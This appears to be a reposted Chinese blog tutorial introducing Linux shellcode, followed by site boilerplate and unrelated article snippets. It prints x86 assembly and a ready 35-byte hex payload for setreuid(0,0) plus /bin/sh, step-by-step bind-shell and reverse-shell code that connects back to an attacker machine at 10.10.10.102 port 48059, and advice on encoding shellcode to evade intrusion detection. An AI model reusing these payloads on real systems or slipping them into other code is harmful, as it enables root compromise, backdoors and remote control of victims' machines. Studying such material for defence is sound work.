黑客的关键工具:Shellcode简介

对于初期接触网络安全的人来说,Shellcode是很神秘的东西,对于网络攻击过程中的嗅探信息、漏洞剖析都是可以理解的,但真正利用漏洞入侵时,通过把一段二进制码送入后并执行,就可以获得目标机器的控制权,之后的事情是属于爱好者学习技术,还是黑客的行为,就看攻击者的一念之差了。Shellcode就好象神秘的武器,安全防护变得如此不堪一击。Shellcode究竟是什么样的程序?是什么特殊代码?如何才能学会编写?我下面收集了几类常见的Shellcode,主要是学习使用。它其实也是一般的软件程序,主要是因为二进制码的“不可读性”,增加了神秘色彩。

Shellcode是指能完成特殊任务的自包含的二进制代码,根据不同的任务可能是发出一条系统调用或建立一个高权限的Shell,Shellcode也就由此得名。它的最终目的是取得目标机器的控制权,所以一般被攻击者利用系统的漏洞送入系统中执行,从而获取特殊权限的执行环境,或给自己设立有特权的帐户。Shellcode因操作系统有一些差异,这里以Linux为例。

Shellcode是一段高技巧的软件代码,为了小而精,一般直接写为16进制的操作码,当然编写者一般采用C或汇编编写,然后通过汇编程序成为16进制的操作码。

1、获取特殊权限:攻击的目标通常是某个SUID(具有高权限的系统程序)程序,因为它可以具有较高的特权去执行一些命令(比如修口令等),好的SUID程序会在不必要时放弃过高的特权,需要时再重新设置获取特权。Setreuid是用来设置(恢复)进程的真实和有效的用户ID。当然也就可以设置root(0)的权限。

xor ebx,ebx     参数一:真实用户id(ruid)=0

xor ecx,ecx     参数二:有效用户id(euid)=0

xor eax,eax

mov al,0x46     系统调用0x46

int 0x80        设置setreuid(0,0)

有了root(0)用户权限,系统基本就归你指挥了。

2、执行/bin/sh: 有了特权,还要有个“工作室”,shell是Linux常用的控制台,取得一个有特权的shell,就可以让你“随意”工作了。建立一个shell并不复杂,一般采用execve调用执行/bin/sh软件

char *shell[2];

shell[0]=”/bin/sh”;

shell[1]=0;

execve(shell[0],shell,NULL);

该调用C语言编写很简单,对应的汇编代码也不复杂:

xor eax,eax         eax=0

push eax            eax=null

push 0x68732f2f     压栈 //sh

push 0x6e69622f     压栈 /bin

mov ebx,esp         ebx=esp指向/bin/sh

push eax            eax=null  结束栈null

push ebx            参数2   ebx指向/bin/sh

mov ecx,esp         参数3   ecx指向[“/bin/sh”,NULL]

xor edx,edx          参数4   edx=NULL

mov al,0xb           参数1   eax=0xb

int 0x80

综合以上两个部分,就是最常见的Shellcode了,具体生成的16进制代码如下(共35个字节):

\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80            ;setreuid(0,0)\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80                          ;执行/bin/sh

本栏目更多精彩内容:http://www.bianceng.cnhttp://www.bianceng.cn/Network/Security/

该代码可以放置在缓冲区内,通过指针函数调用执行。在缓冲区溢出等方式获得执行权利时,运行该段代码就可以打开一个具有root(0)权限的shell界面。

Shellcode在不同的场合,可能有严格的限制,比如在命令行溢出漏洞时,不能太大,没有有效的空间来存放代码,所以要严格精简代码的长度。在SQL注入时对长度的要求更加苛刻,所以很多业界流行的、优秀的Shellcode是经过各种技巧精练的结果。Shellcode是攻击注入代码的统称,并非一定是打开Shell,根据漏洞程序本身的特性有很多的改变,有兴趣的朋友可以从网上收集。

3、绑定到端口的Shellcode

用shellcode在目标计算机上打开一个端口(通讯服务),并将Shell绑定到该端口,攻击者可以放弃入侵时的用的端口,等于在目标机器上建立了系统的后门。该端口可以为入侵者随时建立连接,因为是打开了shell,所以等于建立远程控制目标的控制台。

开启服务离不开Socket,Socket定义为一个端口和一个IP到一个进程的绑定。

a) 建立本地IP Socket,TCP

int server

server=socket(2,1,0)

b) 用IP和端口建立一个Sockaddr_in结构

struct sockaddr_in server_addr

server_addr.sin_addr.s_addr=0         socket的地址设为本地地址

server_addr.sin_port=0xBBBB         socket的端口设为0xBBBB=48059

server_addr.sin_family=2              协议族为IP

c) 将端口和IP绑定到Socket上

bind(server, (struct sockaddr *)&server_addr, 0x10)

d) 以监听模式启动socket:打开端口并等待连接

listen(server, 0)

e) 有连接时,向客户返回一个句柄

int client

client=accept(server, 0, 0)

f) 将返回的句柄,复制到stdin、stdout、stderr,shell输出到攻击者(client)的屏幕

dup2(client,0)

dup2(client,1)

dup2(client,2)

g) 调用普通的execve执行shellcode

char *shell[2];

shell[0]=”/bin/sh”

shell[1]=0

execve(shell[0], shell, 0)

4、反向连接的shellcode

当目标计算机在防火墙后时,防火墙不允许外边的计算机主动访问目标机器。所以即使采用上边的shellcode建立了服务后门,你还是不能与目标计算机建立连接。反向连接的含义就是,让目标计算机通过特定的IP(攻击者的)和端口反向连接到攻击者,也可以设定为在固定的时间段主动来建立连接。

很多木马就利用这种方式,主动连接带木马的管理者,“神不知,鬼不觉”地把目标计算机加入到某个“僵尸网络”的黑社会团伙中。

a) 建立本地IP Socket,TCP

int soc

soc=socket(2,1,0)

b) 用IP和端口建立一个Sockaddr_in结构

struct sockaddr_in server_addr

server_addr.sin_addr.s_addr=0x660A0A0A   socket的地址设为10.10.10.102

server_addr.sin_port=0xBBBB             socket的端口设为0xBBBB=48059

server_addr.sin_family=2                 协议族为IP

c) 建立反向连接connect

int remote

remote=connect(soc, (struct sockaddr*)&server_addr, 0x10)

d) 将socket复制到stdin、stdout、stderr,shell输出到攻击者的屏幕

dup2(soc,0)

dup2(soc,1)

dup2(soc,2)

e) 调用普通的execve执行shellcode

char *shell[2];

shell[0]=”/bin/sh”

shell[1]=0

execve(shell[0], shell, 0)

注意:10.10.10.102为防火墙外攻击机器的地址,此时在该机器上要启动一个监听48059端口的服务

5、躲避IDS的过滤

由于经典的Shellcode并不是有很多的版本,大多数人员都是采用同样的Shellcode,很少有人自己编写。所以IDS厂商把常见的Shellcode的指纹提取出来,作为验证攻击行为的“特征”,很多攻击行为就暴露在IDS的监控之下,网络管理人员可以很快知道你到了他的网络内部,进而采取“捕获”措施。

所以,隐藏指纹,变换代码,Shellcode也在不断更新。技术很多,这里就不例举了,提一个有意思的思路:因为Shellcode的基本功能相同,都是诱使目标机器执行这些指令,目标代码在传输和存放时是很容易被IDS或系统察觉的,那么直到被执行前才恢复原来面貌是一个好注意。所以有人通过把代码简单移位,“加密”后的代码没有任何“意义”,到执行前再反向移位,被检测到的概率就小多了,这种方式对躲避IDS是很有效果的。

本文出自 “Jack zhai” 博客,请务必保留此出处http://zhaisj.blog.51cto.com/219066/61428

以上是小编为您精心准备的的内容,在的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索shell
, shell如何编写
, 代码
, 端口
, shellcode
, dup2
, 二进制c语言socket
, 一个
, 常见特殊设
, execv
目标
,以便于您获取更多的相关知识。

时间: 2024-09-14 17:35:13

黑客的关键工具:Shellcode简介的相关文章

解密:Gamaredon黑客组织的工具进化与分析

本文讲的是解密:Gamaredon黑客组织的工具进化与分析, Palo Alto Networks 的威胁情报团队Unit 42最近观察到一个威胁组织正在分发最新定制开发的恶意软件.Unit 42将这个威胁组织定义为Gamaredon组织,研究表明Gamaredon组织自2013年以来就一直很活跃. 在过去,Gamaredon组织会大量使用现成的工具,不过最新的研究表明,Gamaredon组织已经转向定制开发的恶意软件,这一转变表明Gamaredon组织技术能力已经大幅提高.自定义开发的恶意软件

[原]【实例化需求】1.FitNesse工具应用简介

[SBE]FitNesse工具应用简介  摘要:随着敏捷精益的流行,ATDD与SBE的概念也逐渐被推广,而据<实例化需求>一书作者介绍,在SBE中有两款工具应用比较流行,一个是 Concordion,另一个就是 FitNesse,笔者对FitNess进行了初步的使用,在本文中将经验将简要分享一下. 要详细了解实例化需求,也可参考网站:http://specificationbyexample.com   一.FitNesse介绍 1.基本介绍: l         FitNesse是一套软件开

Linux包管理工具yum简介

什么是yum: Yum(全称为 Yellow dog Updater, Modified)是redhat系列linux系统的包管理工具.就是类似windows下安装软件那个下一步下一步的东西.由于linux的开源,所以linux下的软件有大量组件依赖.这导致了linux安装一个软件必须先安装各依赖包,yum就是帮助我们解决这个的. yum的基础是RPM,RPM是由红帽公司开发的软件包管理方式,使用rpm我们可以方便的进行软件的安装.查询.卸载.升级等工作.但是RPM软件包之间的依赖性问题往往会很

简化Kubernetes应用部署工具-Helm简介

本文讲的是简化Kubernetes应用部署工具-Helm简介[编者的话]微服务和容器化给复杂应用部署与管理带来了极大的挑战.Helm是目前Kubernetes服务编排领域的唯一开源子项目,做为Kubernetes应用的一个包管理工具,可理解为Kubernetes的apt-get / yum,由Deis 公司发起,该公司已经被微软收购.Helm通过软件打包的形式,支持发布的版本管理和控制,很大程度上简化了Kubernetes应用部署和管理的复杂性. 随着业务容器化与向微服务架构转变,通过分解巨大的

Oracle诊断工具SQLT简介 (文档 ID 1677588.1、1526574.1)

Oracle诊断工具SQLT简介 (文档 ID 1677588.1.1526574.1) SQLT 使用指南 (文档 ID 1677588.1)   文档详细信息   类型: 状态: 上次主更新: 上次更新: 语言: REFERENCE PUBLISHED 2016-6-16 2016-6-16 English简体中文??? 215187.1SQLTXPLAIN (SQLT) 12.1.06 2014年1月30日 帮助诊断性能较差的 SQL 语句的工具 SQLT 概览 安全模式 安装 SQLT

Apache/IIS的日志分析工具AWStats简介

你完全不必耐心看完所有内容:简要安装说明如下 安装 http://sourceforge.net/projects/awstats/ 下载安装包后: GNU/Linux:tar zxf awstats-version.tgz awstats的脚本和静态文件缺省都在wwwroot目录下:将cgi-bin目录下的文件都部署到 cgi-bin/目录下:/home/apache/cgi-bin/awstats/ mv awstats-version/wwwroot/cgi-bin /path/to/ap

系统关联修复工具SREng简介

System Repair Engineer(SREng) 是一款全新的.强有力的.可扩充的用于调整和修复你系统的免费工具,在这个工具的帮助下,你可以察觉你的系统故障并能够很容易的修复他们. 本工具的前身是 RegFix 注册表关键值修复工具,由于 RegFix 注册表关键值修复工具的局限性和当前系统环境的复杂性,我重新设计了一个新的软件,即 System Repair Engineer (SREng) . System Repair Engineer 的开发目的是: 提供一个能够较快诊断出系统

iOS程序依赖管理的工具CocoaPods简介

1. 简介 CocoaPods是一个负责管理iOS项目中第三方开源代码的工具,其源码在Github上开源.使用CocoaPods可以 节省设置和更新第三方开源库的时间并提高工作效率. 2. CocoaPods的安装和使用 2.1 安装 在终端中依次输入以下两条命令: sudo gem install cocoapods pod setup 2.2 使用 2.2.1  基本使用 1) 在Xcode中新建项目,例如PodsDemo,创建完成之后退出Xcode.打开终端,cd进入该文件夹所在目录 2)

IBM Rational Application Developer代码覆盖工具入门简介

为您的 Java 程序生成代码覆盖统计数据 简介:代码覆盖率工具是软件测试过程中使用到的一个重要的工具,因为它提供了一个关于程序被测 试用例覆盖程度的观点.本文向您展示了怎样使用 IBM Rational Application Developer 中提供的代码覆盖工具,来为 Java 程序生成测试的覆盖率结果,并提供了关于怎样分析结果以 改进测试的信息. 什么是 Rational Code Coverage 特性? 代码覆盖率是软件测试的一个 重要方面,对于一个构件的总体系统测试来说可能是一个